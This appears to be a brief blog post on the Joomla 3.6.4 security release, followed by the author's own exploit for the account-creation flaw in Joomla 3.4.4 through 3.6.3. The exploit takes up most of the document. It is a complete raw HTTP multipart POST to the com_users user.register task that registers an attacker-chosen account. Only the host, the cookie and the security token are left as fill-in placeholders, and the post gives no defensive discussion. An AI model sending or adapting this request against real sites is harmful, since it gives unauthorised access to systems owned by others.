Yesterday Joomla published version 3.6.4, an update to patch security issues:
- High Priority — Core — Account Creation (affecting Joomla! 3.4.4 through 3.6.3) More information
- High Priority — Core — Elevated Privileges (affecting Joomla! 3.4.4 through 3.6.3) More information
Because I was curious to see how these vulnerabilies worked I decided to check out the patch and write an exploit. By looking at the changes, the issue had to be in the components/com_users/controllers/user.php file.
EXPLOIT
=========================================================
POST /index.php?option=com_users&task=user.register HTTP/1.1
Host: [INSERT_HOST]
Referer: [INSERT_HOST]/index.php/component/users/?view=registration
Cookie: [INSERT_COOKIE]
Connection: close
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[name]"
hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[username]"
hackers
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password1]"
password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[password2]"
password
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email1]"
email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="user[email2]"
email@example.com
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="option"
com_users
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="task"
user.register
------WebKitFormBoundarydPTNyMPMzmAhBsf4
Content-Disposition: form-data; name="[INSERT_SECURITY_TOKEN]"
1
------WebKitFormBoundarydPTNyMPMzmAhBsf4--
=========================================================